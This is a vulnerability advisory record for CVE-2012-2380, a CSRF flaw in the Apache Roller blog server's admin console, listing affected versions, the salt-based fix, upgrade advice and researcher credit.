ID: SECURITYVULNS:DOC:28260
Type: securityvulns
Reporter: Securityvulns
Modified: 2012-07-09T00:00:00
Description
Severity: important
Vendor: The Apache Software Foundation
Versions Affected:
Roller 4.0.0 to Roller 4.0.1
Roller 5.0
The unsupported Roller 3.1 release is also affected
Description:
HTTP POST interfaces in the Roller admin/editor console were not
protected from CSRF attacks. This issue has been fixed by requiring a
valid per user and per session "salt" value in all HTTP POST requests.
Mitigation
Roller 4.0 and 4.0.1 users should upgrade to Roller 5.0.1
Roller 5.0 users should upgrade to Roller 5.0.1
Roller 3.1 users should upgrade to Roller 5.0.1
Credit:
This issue was discovered by Jun Zhu, PhD student, University of North
Carolina, Charlotte
Title: CVE-2012-2380: Apache Roller Cross-Site-Resource-Forgery (XSRF) vulnerability
Published: 2012-07-09T00:00:00
Source: https://vulners.com/securityvulns/SECURITYVULNS:DOC:28260